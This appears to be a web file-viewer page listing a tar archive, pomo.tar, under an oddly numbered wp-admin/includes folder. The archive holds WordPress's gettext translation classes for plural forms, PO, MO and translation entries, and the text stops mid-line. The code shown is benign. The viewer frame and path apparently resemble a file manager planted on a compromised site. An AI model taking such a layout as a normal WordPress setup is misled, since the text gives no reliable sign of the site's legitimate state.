Submit
Path:
~
/
home
/
contenidosenred
/
www
/
OD
/
wp-admin
/
includes
/
219846
/
File Content:
pomo.tar
plural-forms.php 0000644 00000016731 15105405334 0007710 0 ustar 00 <?php /** * A gettext Plural-Forms parser. * * @since 4.9.0 */ if ( ! class_exists( 'Plural_Forms', false ) ) : #[AllowDynamicProperties] class Plural_Forms { /** * Operator characters. * * @since 4.9.0 * @var string OP_CHARS Operator characters. */ const OP_CHARS = '|&><!=%?:'; /** * Valid number characters. * * @since 4.9.0 * @var string NUM_CHARS Valid number characters. */ const NUM_CHARS = '0123456789'; /** * Operator precedence. * * Operator precedence from highest to lowest. Higher numbers indicate * higher precedence, and are executed first. * * @see https://en.wikipedia.org/wiki/Operators_in_C_and_C%2B%2B#Operator_precedence * * @since 4.9.0 * @var array $op_precedence Operator precedence from highest to lowest. */ protected static $op_precedence = array( '%' => 6, '<' => 5, '<=' => 5, '>' => 5, '>=' => 5, '==' => 4, '!=' => 4, '&&' => 3, '||' => 2, '?:' => 1, '?' => 1, '(' => 0, ')' => 0, ); /** * Tokens generated from the string. * * @since 4.9.0 * @var array $tokens List of tokens. */ protected $tokens = array(); /** * Cache for repeated calls to the function. * * @since 4.9.0 * @var array $cache Map of $n => $result */ protected $cache = array(); /** * Constructor. * * @since 4.9.0 * * @param string $str Plural function (just the bit after `plural=` from Plural-Forms) */ public function __construct( $str ) { $this->parse( $str ); } /** * Parse a Plural-Forms string into tokens. * * Uses the shunting-yard algorithm to convert the string to Reverse Polish * Notation tokens. * * @since 4.9.0 * * @throws Exception If there is a syntax or parsing error with the string. * * @param string $str String to parse. */ protected function parse( $str ) { $pos = 0; $len = strlen( $str ); // Convert infix operators to postfix using the shunting-yard algorithm. $output = array(); $stack = array(); while ( $pos < $len ) { $next = substr( $str, $pos, 1 ); switch ( $next ) { // Ignore whitespace. case ' ': case "\t": ++$pos; break; // Variable (n). case 'n': $output[] = array( 'var' ); ++$pos; break; // Parentheses. case '(': $stack[] = $next; ++$pos; break; case ')': $found = false; while ( ! empty( $stack ) ) { $o2 = $stack[ count( $stack ) - 1 ]; if ( '(' !== $o2 ) { $output[] = array( 'op', array_pop( $stack ) ); continue; } // Discard open paren. array_pop( $stack ); $found = true; break; } if ( ! $found ) { throw new Exception( 'Mismatched parentheses' ); } ++$pos; break; // Operators. case '|': case '&': case '>': case '<': case '!': case '=': case '%': case '?': $end_operator = strspn( $str, self::OP_CHARS, $pos ); $operator = substr( $str, $pos, $end_operator ); if ( ! array_key_exists( $operator, self::$op_precedence ) ) { throw new Exception( sprintf( 'Unknown operator "%s"', $operator ) ); } while ( ! empty( $stack ) ) { $o2 = $stack[ count( $stack ) - 1 ]; // Ternary is right-associative in C. if ( '?:' === $operator || '?' === $operator ) { if ( self::$op_precedence[ $operator ] >= self::$op_precedence[ $o2 ] ) { break; } } elseif ( self::$op_precedence[ $operator ] > self::$op_precedence[ $o2 ] ) { break; } $output[] = array( 'op', array_pop( $stack ) ); } $stack[] = $operator; $pos += $end_operator; break; // Ternary "else". case ':': $found = false; $s_pos = count( $stack ) - 1; while ( $s_pos >= 0 ) { $o2 = $stack[ $s_pos ]; if ( '?' !== $o2 ) { $output[] = array( 'op', array_pop( $stack ) ); --$s_pos; continue; } // Replace. $stack[ $s_pos ] = '?:'; $found = true; break; } if ( ! $found ) { throw new Exception( 'Missing starting "?" ternary operator' ); } ++$pos; break; // Default - number or invalid. default: if ( $next >= '0' && $next <= '9' ) { $span = strspn( $str, self::NUM_CHARS, $pos ); $output[] = array( 'value', intval( substr( $str, $pos, $span ) ) ); $pos += $span; break; } throw new Exception( sprintf( 'Unknown symbol "%s"', $next ) ); } } while ( ! empty( $stack ) ) { $o2 = array_pop( $stack ); if ( '(' === $o2 || ')' === $o2 ) { throw new Exception( 'Mismatched parentheses' ); } $output[] = array( 'op', $o2 ); } $this->tokens = $output; } /** * Get the plural form for a number. * * Caches the value for repeated calls. * * @since 4.9.0 * * @param int $num Number to get plural form for. * @return int Plural form value. */ public function get( $num ) { if ( isset( $this->cache[ $num ] ) ) { return $this->cache[ $num ]; } $this->cache[ $num ] = $this->execute( $num ); return $this->cache[ $num ]; } /** * Execute the plural form function. * * @since 4.9.0 * * @throws Exception If the plural form value cannot be calculated. * * @param int $n Variable "n" to substitute. * @return int Plural form value. */ public function execute( $n ) { $stack = array(); $i = 0; $total = count( $this->tokens ); while ( $i < $total ) { $next = $this->tokens[ $i ]; ++$i; if ( 'var' === $next[0] ) { $stack[] = $n; continue; } elseif ( 'value' === $next[0] ) { $stack[] = $next[1]; continue; } // Only operators left. switch ( $next[1] ) { case '%': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 % $v2; break; case '||': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 || $v2; break; case '&&': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 && $v2; break; case '<': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 < $v2; break; case '<=': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 <= $v2; break; case '>': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 > $v2; break; case '>=': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 >= $v2; break; case '!=': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 !== $v2; break; case '==': $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 === $v2; break; case '?:': $v3 = array_pop( $stack ); $v2 = array_pop( $stack ); $v1 = array_pop( $stack ); $stack[] = $v1 ? $v2 : $v3; break; default: throw new Exception( sprintf( 'Unknown operator "%s"', $next[1] ) ); } } if ( count( $stack ) !== 1 ) { throw new Exception( 'Too many values remaining on the stack' ); } return (int) $stack[0]; } } endif; po.php 0000644 00000035775 15105405334 0005714 0 ustar 00 <?php /** * Class for working with PO files * * @version $Id: po.php 1158 2015-11-20 04:31:23Z dd32 $ * @package pomo * @subpackage po */ require_once __DIR__ . '/translations.php'; if ( ! defined( 'PO_MAX_LINE_LEN' ) ) { define( 'PO_MAX_LINE_LEN', 79 ); } /* * The `auto_detect_line_endings` setting has been deprecated in PHP 8.1, * but will continue to work until PHP 9.0. * For now, we're silencing the deprecation notice as there may still be * translation files around which haven't been updated in a long time and * which still use the old MacOS standalone `\r` as a line ending. * This fix should be revisited when PHP 9.0 is in alpha/beta. */ @ini_set( 'auto_detect_line_endings', 1 ); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged /** * Routines for working with PO files */ if ( ! class_exists( 'PO', false ) ) : class PO extends Gettext_Translations { public $comments_before_headers = ''; /** * Exports headers to a PO entry * * @return string msgid/msgstr PO entry for this PO file headers, doesn't contain newline at the end */ public function export_headers() { $header_string = ''; foreach ( $this->headers as $header => $value ) { $header_string .= "$header: $value\n"; } $poified = PO::poify( $header_string ); if ( $this->comments_before_headers ) { $before_headers = $this->prepend_each_line( rtrim( $this->comments_before_headers ) . "\n", '# ' ); } else { $before_headers = ''; } return rtrim( "{$before_headers}msgid \"\"\nmsgstr $poified" ); } /** * Exports all entries to PO format * * @return string sequence of msgid/msgstr PO strings, doesn't contain a newline at the end */ public function export_entries() { // TODO: Sorting. return implode( "\n\n", array_map( array( 'PO', 'export_entry' ), $this->entries ) ); } /** * Exports the whole PO file as a string * * @param bool $include_headers whether to include the headers in the export * @return string ready for inclusion in PO file string for headers and all the entries */ public function export( $include_headers = true ) { $res = ''; if ( $include_headers ) { $res .= $this->export_headers(); $res .= "\n\n"; } $res .= $this->export_entries(); return $res; } /** * Same as {@link export}, but writes the result to a file * * @param string $filename Where to write the PO string. * @param bool $include_headers Whether to include the headers in the export. * @return bool true on success, false on error */ public function export_to_file( $filename, $include_headers = true ) { $fh = fopen( $filename, 'w' ); if ( false === $fh ) { return false; } $export = $this->export( $include_headers ); $res = fwrite( $fh, $export ); if ( false === $res ) { return false; } return fclose( $fh ); } /** * Text to include as a comment before the start of the PO contents * * Doesn't need to include # in the beginning of lines, these are added automatically * * @param string $text Text to include as a comment. */ public function set_comment_before_headers( $text ) { $this->comments_before_headers = $text; } /** * Formats a string in PO-style * * @param string $input_string the string to format * @return string the poified string */ public static function poify( $input_string ) { $quote = '"'; $slash = '\\'; $newline = "\n"; $replaces = array( "$slash" => "$slash$slash", "$quote" => "$slash$quote", "\t" => '\t', ); $input_string = str_replace( array_keys( $replaces ), array_values( $replaces ), $input_string ); $po = $quote . implode( "{$slash}n{$quote}{$newline}{$quote}", explode( $newline, $input_string ) ) . $quote; // Add empty string on first line for readability. if ( str_contains( $input_string, $newline ) && ( substr_count( $input_string, $newline ) > 1 || substr( $input_string, -strlen( $newline ) ) !== $newline ) ) { $po = "$quote$quote$newline$po"; } // Remove empty strings. $po = str_replace( "$newline$quote$quote", '', $po ); return $po; } /** * Gives back the original string from a PO-formatted string * * @param string $input_string PO-formatted string * @return string unescaped string */ public static function unpoify( $input_string ) { $escapes = array( 't' => "\t", 'n' => "\n", 'r' => "\r", '\\' => '\\', ); $lines = array_map( 'trim', explode( "\n", $input_string ) ); $lines = array_map( array( 'PO', 'trim_quotes' ), $lines ); $unpoified = ''; $previous_is_backslash = false; foreach ( $lines as $line ) { preg_match_all( '/./u', $line, $chars ); $chars = $chars[0]; foreach ( $chars as $char ) { if ( ! $previous_is_backslash ) { if ( '\\' === $char ) { $previous_is_backslash = true; } else { $unpoified .= $char; } } else { $previous_is_backslash = false; $unpoified .= isset( $escapes[ $char ] ) ? $escapes[ $char ] : $char; } } } // Standardize the line endings on imported content, technically PO files shouldn't contain \r. $unpoified = str_replace( array( "\r\n", "\r" ), "\n", $unpoified ); return $unpoified; } /** * Inserts $with in the beginning of every new line of $input_string and * returns the modified string * * @param string $input_string prepend lines in this string * @param string $with prepend lines with this string */ public static function prepend_each_line( $input_string, $with ) { $lines = explode( "\n", $input_string ); $append = ''; if ( "\n" === substr( $input_string, -1 ) && '' === end( $lines ) ) { /* * Last line might be empty because $input_string was terminated * with a newline, remove it from the $lines array, * we'll restore state by re-terminating the string at the end. */ array_pop( $lines ); $append = "\n"; } foreach ( $lines as &$line ) { $line = $with . $line; } unset( $line ); return implode( "\n", $lines ) . $append; } /** * Prepare a text as a comment -- wraps the lines and prepends # * and a special character to each line * * @access private * @param string $text the comment text * @param string $char character to denote a special PO comment, * like :, default is a space */ public static function comment_block( $text, $char = ' ' ) { $text = wordwrap( $text, PO_MAX_LINE_LEN - 3 ); return PO::prepend_each_line( $text, "#$char " ); } /** * Builds a string from the entry for inclusion in PO file * * @param Translation_Entry $entry the entry to convert to po string. * @return string|false PO-style formatted string for the entry or * false if the entry is empty */ public static function export_entry( $entry ) { if ( null === $entry->singular || '' === $entry->singular ) { return false; } $po = array(); if ( ! empty( $entry->translator_comments ) ) { $po[] = PO::comment_block( $entry->translator_comments ); } if ( ! empty( $entry->extracted_comments ) ) { $po[] = PO::comment_block( $entry->extracted_comments, '.' ); } if ( ! empty( $entry->references ) ) { $po[] = PO::comment_block( implode( ' ', $entry->references ), ':' ); } if ( ! empty( $entry->flags ) ) { $po[] = PO::comment_block( implode( ', ', $entry->flags ), ',' ); } if ( $entry->context ) { $po[] = 'msgctxt ' . PO::poify( $entry->context ); } $po[] = 'msgid ' . PO::poify( $entry->singular ); if ( ! $entry->is_plural ) { $translation = empty( $entry->translations ) ? '' : $entry->translations[0]; $translation = PO::match_begin_and_end_newlines( $translation, $entry->singular ); $po[] = 'msgstr ' . PO::poify( $translation ); } else { $po[] = 'msgid_plural ' . PO::poify( $entry->plural ); $translations = empty( $entry->translations ) ? array( '', '' ) : $entry->translations; foreach ( $translations as $i => $translation ) { $translation = PO::match_begin_and_end_newlines( $translation, $entry->plural ); $po[] = "msgstr[$i] " . PO::poify( $translation ); } } return implode( "\n", $po ); } public static function match_begin_and_end_newlines( $translation, $original ) { if ( '' === $translation ) { return $translation; } $original_begin = "\n" === substr( $original, 0, 1 ); $original_end = "\n" === substr( $original, -1 ); $translation_begin = "\n" === substr( $translation, 0, 1 ); $translation_end = "\n" === substr( $translation, -1 ); if ( $original_begin ) { if ( ! $translation_begin ) { $translation = "\n" . $translation; } } elseif ( $translation_begin ) { $translation = ltrim( $translation, "\n" ); } if ( $original_end ) { if ( ! $translation_end ) { $translation .= "\n"; } } elseif ( $translation_end ) { $translation = rtrim( $translation, "\n" ); } return $translation; } /** * @param string $filename * @return bool */ public function import_from_file( $filename ) { $f = fopen( $filename, 'r' ); if ( ! $f ) { return false; } $lineno = 0; while ( true ) { $res = $this->read_entry( $f, $lineno ); if ( ! $res ) { break; } if ( '' === $res['entry']->singular ) { $this->set_headers( $this->make_headers( $res['entry']->translations[0] ) ); } else { $this->add_entry( $res['entry'] ); } } PO::read_line( $f, 'clear' ); if ( false === $res ) { return false; } if ( ! $this->headers && ! $this->entries ) { return false; } return true; } /** * Helper function for read_entry * * @param string $context * @return bool */ protected static function is_final( $context ) { return ( 'msgstr' === $context ) || ( 'msgstr_plural' === $context ); } /** * @param resource $f * @param int $lineno * @return null|false|array */ public function read_entry( $f, $lineno = 0 ) { $entry = new Translation_Entry(); // Where were we in the last step. // Can be: comment, msgctxt, msgid, msgid_plural, msgstr, msgstr_plural. $context = ''; $msgstr_index = 0; while ( true ) { ++$lineno; $line = PO::read_line( $f ); if ( ! $line ) { if ( feof( $f ) ) { if ( self::is_final( $context ) ) { break; } elseif ( ! $context ) { // We haven't read a line and EOF came. return null; } else { return false; } } else { return false; } } if ( "\n" === $line ) { continue; } $line = trim( $line ); if ( preg_match( '/^#/', $line, $m ) ) { // The comment is the start of a new entry. if ( self::is_final( $context ) ) { PO::read_line( $f, 'put-back' ); --$lineno; break; } // Comments have to be at the beginning. if ( $context && 'comment' !== $context ) { return false; } // Add comment. $this->add_comment_to_entry( $entry, $line ); } elseif ( preg_match( '/^msgctxt\s+(".*")/', $line, $m ) ) { if ( self::is_final( $context ) ) { PO::read_line( $f, 'put-back' ); --$lineno; break; } if ( $context && 'comment' !== $context ) { return false; } $context = 'msgctxt'; $entry->context .= PO::unpoify( $m[1] ); } elseif ( preg_match( '/^msgid\s+(".*")/', $line, $m ) ) { if ( self::is_final( $context ) ) { PO::read_line( $f, 'put-back' ); --$lineno; break; } if ( $context && 'msgctxt' !== $context && 'comment' !== $context ) { return false; } $context = 'msgid'; $entry->singular .= PO::unpoify( $m[1] ); } elseif ( preg_match( '/^msgid_plural\s+(".*")/', $line, $m ) ) { if ( 'msgid' !== $context ) { return false; } $context = 'msgid_plural'; $entry->is_plural = true; $entry->plural .= PO::unpoify( $m[1] ); } elseif ( preg_match( '/^msgstr\s+(".*")/', $line, $m ) ) { if ( 'msgid' !== $context ) { return false; } $context = 'msgstr'; $entry->translations = array( PO::unpoify( $m[1] ) ); } elseif ( preg_match( '/^msgstr\[(\d+)\]\s+(".*")/', $line, $m ) ) { if ( 'msgid_plural' !== $context && 'msgstr_plural' !== $context ) { return false; } $context = 'msgstr_plural'; $msgstr_index = $m[1]; $entry->translations[ $m[1] ] = PO::unpoify( $m[2] ); } elseif ( preg_match( '/^".*"$/', $line ) ) { $unpoified = PO::unpoify( $line ); switch ( $context ) { case 'msgid': $entry->singular .= $unpoified; break; case 'msgctxt': $entry->context .= $unpoified; break; case 'msgid_plural': $entry->plural .= $unpoified; break; case 'msgstr': $entry->translations[0] .= $unpoified; break; case 'msgstr_plural': $entry->translations[ $msgstr_index ] .= $unpoified; break; default: return false; } } else { return false; } } $have_translations = false; foreach ( $entry->translations as $t ) { if ( $t || ( '0' === $t ) ) { $have_translations = true; break; } } if ( false === $have_translations ) { $entry->translations = array(); } return array( 'entry' => $entry, 'lineno' => $lineno, ); } /** * @param resource $f * @param string $action * @return bool */ public function read_line( $f, $action = 'read' ) { static $last_line = ''; static $use_last_line = false; if ( 'clear' === $action ) { $last_line = ''; return true; } if ( 'put-back' === $action ) { $use_last_line = true; return true; } $line = $use_last_line ? $last_line : fgets( $f ); $line = ( "\r\n" === substr( $line, -2 ) ) ? rtrim( $line, "\r\n" ) . "\n" : $line; $last_line = $line; $use_last_line = false; return $line; } /** * @param Translation_Entry $entry * @param string $po_comment_line */ public function add_comment_to_entry( &$entry, $po_comment_line ) { $first_two = substr( $po_comment_line, 0, 2 ); $comment = trim( substr( $po_comment_line, 2 ) ); if ( '#:' === $first_two ) { $entry->references = array_merge( $entry->references, preg_split( '/\s+/', $comment ) ); } elseif ( '#.' === $first_two ) { $entry->extracted_comments = trim( $entry->extracted_comments . "\n" . $comment ); } elseif ( '#,' === $first_two ) { $entry->flags = array_merge( $entry->flags, preg_split( '/,\s*/', $comment ) ); } else { $entry->translator_comments = trim( $entry->translator_comments . "\n" . $comment ); } } /** * @param string $s * @return string */ public static function trim_quotes( $s ) { if ( str_starts_with( $s, '"' ) ) { $s = substr( $s, 1 ); } if ( str_ends_with( $s, '"' ) ) { $s = substr( $s, 0, -1 ); } return $s; } } endif; entry.php 0000644 00000007427 15105405334 0006430 0 ustar 00 <?php /** * Contains Translation_Entry class * * @version $Id: entry.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage entry */ if ( ! class_exists( 'Translation_Entry', false ) ) : /** * Translation_Entry class encapsulates a translatable string. * * @since 2.8.0 */ #[AllowDynamicProperties] class Translation_Entry { /** * Whether the entry contains a string and its plural form, default is false. * * @var bool */ public $is_plural = false; public $context = null; public $singular = null; public $plural = null; public $translations = array(); public $translator_comments = ''; public $extracted_comments = ''; public $references = array(); public $flags = array(); /** * @param array $args { * Arguments array, supports the following keys: * * @type string $singular The string to translate, if omitted an * empty entry will be created. * @type string $plural The plural form of the string, setting * this will set `$is_plural` to true. * @type array $translations Translations of the string and possibly * its plural forms. * @type string $context A string differentiating two equal strings * used in different contexts. * @type string $translator_comments Comments left by translators. * @type string $extracted_comments Comments left by developers. * @type array $references Places in the code this string is used, in * relative_to_root_path/file.php:linenum form. * @type array $flags Flags like php-format. * } */ public function __construct( $args = array() ) { // If no singular -- empty object. if ( ! isset( $args['singular'] ) ) { return; } // Get member variable values from args hash. foreach ( $args as $varname => $value ) { $this->$varname = $value; } if ( isset( $args['plural'] ) && $args['plural'] ) { $this->is_plural = true; } if ( ! is_array( $this->translations ) ) { $this->translations = array(); } if ( ! is_array( $this->references ) ) { $this->references = array(); } if ( ! is_array( $this->flags ) ) { $this->flags = array(); } } /** * PHP4 constructor. * * @since 2.8.0 * @deprecated 5.4.0 Use __construct() instead. * * @see Translation_Entry::__construct() */ public function Translation_Entry( $args = array() ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $args ); } /** * Generates a unique key for this entry. * * @since 2.8.0 * * @return string|false The key or false if the entry is null. */ public function key() { if ( null === $this->singular ) { return false; } // Prepend context and EOT, like in MO files. $key = ! $this->context ? $this->singular : $this->context . "\4" . $this->singular; // Standardize on \n line endings. $key = str_replace( array( "\r\n", "\r" ), "\n", $key ); return $key; } /** * Merges another translation entry with the current one. * * @since 2.8.0 * * @param Translation_Entry $other Other translation entry. */ public function merge_with( &$other ) { $this->flags = array_unique( array_merge( $this->flags, $other->flags ) ); $this->references = array_unique( array_merge( $this->references, $other->references ) ); if ( $this->extracted_comments !== $other->extracted_comments ) { $this->extracted_comments .= $other->extracted_comments; } } } endif; translations.php 0000644 00000031014 15105405334 0007775 0 ustar 00 <?php /** * Class for a set of entries for translation and their associated headers * * @version $Id: translations.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage translations * @since 2.8.0 */ require_once __DIR__ . '/plural-forms.php'; require_once __DIR__ . '/entry.php'; if ( ! class_exists( 'Translations', false ) ) : /** * Translations class. * * @since 2.8.0 */ #[AllowDynamicProperties] class Translations { /** * List of translation entries. * * @since 2.8.0 * * @var Translation_Entry[] */ public $entries = array(); /** * List of translation headers. * * @since 2.8.0 * * @var array<string, string> */ public $headers = array(); /** * Adds an entry to the PO structure. * * @since 2.8.0 * * @param array|Translation_Entry $entry * @return bool True on success, false if the entry doesn't have a key. */ public function add_entry( $entry ) { if ( is_array( $entry ) ) { $entry = new Translation_Entry( $entry ); } $key = $entry->key(); if ( false === $key ) { return false; } $this->entries[ $key ] = &$entry; return true; } /** * Adds or merges an entry to the PO structure. * * @since 2.8.0 * * @param array|Translation_Entry $entry * @return bool True on success, false if the entry doesn't have a key. */ public function add_entry_or_merge( $entry ) { if ( is_array( $entry ) ) { $entry = new Translation_Entry( $entry ); } $key = $entry->key(); if ( false === $key ) { return false; } if ( isset( $this->entries[ $key ] ) ) { $this->entries[ $key ]->merge_with( $entry ); } else { $this->entries[ $key ] = &$entry; } return true; } /** * Sets $header PO header to $value * * If the header already exists, it will be overwritten * * TODO: this should be out of this class, it is gettext specific * * @since 2.8.0 * * @param string $header header name, without trailing : * @param string $value header value, without trailing \n */ public function set_header( $header, $value ) { $this->headers[ $header ] = $value; } /** * Sets translation headers. * * @since 2.8.0 * * @param array $headers Associative array of headers. */ public function set_headers( $headers ) { foreach ( $headers as $header => $value ) { $this->set_header( $header, $value ); } } /** * Returns a given translation header. * * @since 2.8.0 * * @param string $header * @return string|false Header if it exists, false otherwise. */ public function get_header( $header ) { return isset( $this->headers[ $header ] ) ? $this->headers[ $header ] : false; } /** * Returns a given translation entry. * * @since 2.8.0 * * @param Translation_Entry $entry Translation entry. * @return Translation_Entry|false Translation entry if it exists, false otherwise. */ public function translate_entry( &$entry ) { $key = $entry->key(); return isset( $this->entries[ $key ] ) ? $this->entries[ $key ] : false; } /** * Translates a singular string. * * @since 2.8.0 * * @param string $singular * @param string $context * @return string */ public function translate( $singular, $context = null ) { $entry = new Translation_Entry( array( 'singular' => $singular, 'context' => $context, ) ); $translated = $this->translate_entry( $entry ); return ( $translated && ! empty( $translated->translations ) ) ? $translated->translations[0] : $singular; } /** * Given the number of items, returns the 0-based index of the plural form to use * * Here, in the base Translations class, the common logic for English is implemented: * 0 if there is one element, 1 otherwise * * This function should be overridden by the subclasses. For example MO/PO can derive the logic * from their headers. * * @since 2.8.0 * * @param int $count Number of items. * @return int Plural form to use. */ public function select_plural_form( $count ) { return 1 === (int) $count ? 0 : 1; } /** * Returns the plural forms count. * * @since 2.8.0 * * @return int Plural forms count. */ public function get_plural_forms_count() { return 2; } /** * Translates a plural string. * * @since 2.8.0 * * @param string $singular * @param string $plural * @param int $count * @param string $context * @return string */ public function translate_plural( $singular, $plural, $count, $context = null ) { $entry = new Translation_Entry( array( 'singular' => $singular, 'plural' => $plural, 'context' => $context, ) ); $translated = $this->translate_entry( $entry ); $index = $this->select_plural_form( $count ); $total_plural_forms = $this->get_plural_forms_count(); if ( $translated && 0 <= $index && $index < $total_plural_forms && is_array( $translated->translations ) && isset( $translated->translations[ $index ] ) ) { return $translated->translations[ $index ]; } else { return 1 === (int) $count ? $singular : $plural; } } /** * Merges other translations into the current one. * * @since 2.8.0 * * @param Translations $other Another Translation object, whose translations will be merged in this one (passed by reference). */ public function merge_with( &$other ) { foreach ( $other->entries as $entry ) { $this->entries[ $entry->key() ] = $entry; } } /** * Merges originals with existing entries. * * @since 2.8.0 * * @param Translations $other */ public function merge_originals_with( &$other ) { foreach ( $other->entries as $entry ) { if ( ! isset( $this->entries[ $entry->key() ] ) ) { $this->entries[ $entry->key() ] = $entry; } else { $this->entries[ $entry->key() ]->merge_with( $entry ); } } } } /** * Gettext_Translations class. * * @since 2.8.0 */ class Gettext_Translations extends Translations { /** * Number of plural forms. * * @var int * * @since 2.8.0 */ public $_nplurals; /** * Callback to retrieve the plural form. * * @var callable * * @since 2.8.0 */ public $_gettext_select_plural_form; /** * The gettext implementation of select_plural_form. * * It lives in this class, because there are more than one descendant, which will use it and * they can't share it effectively. * * @since 2.8.0 * * @param int $count Plural forms count. * @return int Plural form to use. */ public function gettext_select_plural_form( $count ) { if ( ! isset( $this->_gettext_select_plural_form ) || is_null( $this->_gettext_select_plural_form ) ) { list( $nplurals, $expression ) = $this->nplurals_and_expression_from_header( $this->get_header( 'Plural-Forms' ) ); $this->_nplurals = $nplurals; $this->_gettext_select_plural_form = $this->make_plural_form_function( $nplurals, $expression ); } return call_user_func( $this->_gettext_select_plural_form, $count ); } /** * Returns the nplurals and plural forms expression from the Plural-Forms header. * * @since 2.8.0 * * @param string $header * @return array{0: int, 1: string} */ public function nplurals_and_expression_from_header( $header ) { if ( preg_match( '/^\s*nplurals\s*=\s*(\d+)\s*;\s+plural\s*=\s*(.+)$/', $header, $matches ) ) { $nplurals = (int) $matches[1]; $expression = trim( $matches[2] ); return array( $nplurals, $expression ); } else { return array( 2, 'n != 1' ); } } /** * Makes a function, which will return the right translation index, according to the * plural forms header. * * @since 2.8.0 * * @param int $nplurals * @param string $expression * @return callable */ public function make_plural_form_function( $nplurals, $expression ) { try { $handler = new Plural_Forms( rtrim( $expression, ';' ) ); return array( $handler, 'get' ); } catch ( Exception $e ) { // Fall back to default plural-form function. return $this->make_plural_form_function( 2, 'n != 1' ); } } /** * Adds parentheses to the inner parts of ternary operators in * plural expressions, because PHP evaluates ternary operators from left to right * * @since 2.8.0 * @deprecated 6.5.0 Use the Plural_Forms class instead. * * @see Plural_Forms * * @param string $expression the expression without parentheses * @return string the expression with parentheses added */ public function parenthesize_plural_exression( $expression ) { $expression .= ';'; $res = ''; $depth = 0; for ( $i = 0; $i < strlen( $expression ); ++$i ) { $char = $expression[ $i ]; switch ( $char ) { case '?': $res .= ' ? ('; ++$depth; break; case ':': $res .= ') : ('; break; case ';': $res .= str_repeat( ')', $depth ) . ';'; $depth = 0; break; default: $res .= $char; } } return rtrim( $res, ';' ); } /** * Prepare translation headers. * * @since 2.8.0 * * @param string $translation * @return array<string, string> Translation headers */ public function make_headers( $translation ) { $headers = array(); // Sometimes \n's are used instead of real new lines. $translation = str_replace( '\n', "\n", $translation ); $lines = explode( "\n", $translation ); foreach ( $lines as $line ) { $parts = explode( ':', $line, 2 ); if ( ! isset( $parts[1] ) ) { continue; } $headers[ trim( $parts[0] ) ] = trim( $parts[1] ); } return $headers; } /** * Sets translation headers. * * @since 2.8.0 * * @param string $header * @param string $value */ public function set_header( $header, $value ) { parent::set_header( $header, $value ); if ( 'Plural-Forms' === $header ) { list( $nplurals, $expression ) = $this->nplurals_and_expression_from_header( $this->get_header( 'Plural-Forms' ) ); $this->_nplurals = $nplurals; $this->_gettext_select_plural_form = $this->make_plural_form_function( $nplurals, $expression ); } } } endif; if ( ! class_exists( 'NOOP_Translations', false ) ) : /** * Provides the same interface as Translations, but doesn't do anything. * * @since 2.8.0 */ #[AllowDynamicProperties] class NOOP_Translations { /** * List of translation entries. * * @since 2.8.0 * * @var Translation_Entry[] */ public $entries = array(); /** * List of translation headers. * * @since 2.8.0 * * @var array<string, string> */ public $headers = array(); public function add_entry( $entry ) { return true; } /** * Sets a translation header. * * @since 2.8.0 * * @param string $header * @param string $value */ public function set_header( $header, $value ) { } /** * Sets translation headers. * * @since 2.8.0 * * @param array $headers */ public function set_headers( $headers ) { } /** * Returns a translation header. * * @since 2.8.0 * * @param string $header * @return false */ public function get_header( $header ) { return false; } /** * Returns a given translation entry. * * @since 2.8.0 * * @param Translation_Entry $entry * @return false */ public function translate_entry( &$entry ) { return false; } /** * Translates a singular string. * * @since 2.8.0 * * @param string $singular * @param string $context */ public function translate( $singular, $context = null ) { return $singular; } /** * Returns the plural form to use. * * @since 2.8.0 * * @param int $count * @return int */ public function select_plural_form( $count ) { return 1 === (int) $count ? 0 : 1; } /** * Returns the plural forms count. * * @since 2.8.0 * * @return int */ public function get_plural_forms_count() { return 2; } /** * Translates a plural string. * * @since 2.8.0 * * @param string $singular * @param string $plural * @param int $count * @param string $context * @return string */ public function translate_plural( $singular, $plural, $count, $context = null ) { return 1 === (int) $count ? $singular : $plural; } /** * Merges other translations into the current one. * * @since 2.8.0 * * @param Translations $other */ public function merge_with( &$other ) { } } endif; mo.php 0000644 00000022503 15105405334 0005672 0 ustar 00 <?php /** * Class for working with MO files * * @version $Id: mo.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage mo */ require_once __DIR__ . '/translations.php'; require_once __DIR__ . '/streams.php'; if ( ! class_exists( 'MO', false ) ) : class MO extends Gettext_Translations { /** * Number of plural forms. * * @var int */ public $_nplurals = 2; /** * Loaded MO file. * * @var string */ private $filename = ''; /** * Returns the loaded MO file. * * @return string The loaded MO file. */ public function get_filename() { return $this->filename; } /** * Fills up with the entries from MO file $filename * * @param string $filename MO file to load * @return bool True if the import from file was successful, otherwise false. */ public function import_from_file( $filename ) { $reader = new POMO_FileReader( $filename ); if ( ! $reader->is_resource() ) { return false; } $this->filename = (string) $filename; return $this->import_from_reader( $reader ); } /** * @param string $filename * @return bool */ public function export_to_file( $filename ) { $fh = fopen( $filename, 'wb' ); if ( ! $fh ) { return false; } $res = $this->export_to_file_handle( $fh ); fclose( $fh ); return $res; } /** * @return string|false */ public function export() { $tmp_fh = fopen( 'php://temp', 'r+' ); if ( ! $tmp_fh ) { return false; } $this->export_to_file_handle( $tmp_fh ); rewind( $tmp_fh ); return stream_get_contents( $tmp_fh ); } /** * @param Translation_Entry $entry * @return bool */ public function is_entry_good_for_export( $entry ) { if ( empty( $entry->translations ) ) { return false; } if ( ! array_filter( $entry->translations ) ) { return false; } return true; } /** * @param resource $fh * @return true */ public function export_to_file_handle( $fh ) { $entries = array_filter( $this->entries, array( $this, 'is_entry_good_for_export' ) ); ksort( $entries ); $magic = 0x950412de; $revision = 0; $total = count( $entries ) + 1; // All the headers are one entry. $originals_lengths_addr = 28; $translations_lengths_addr = $originals_lengths_addr + 8 * $total; $size_of_hash = 0; $hash_addr = $translations_lengths_addr + 8 * $total; $current_addr = 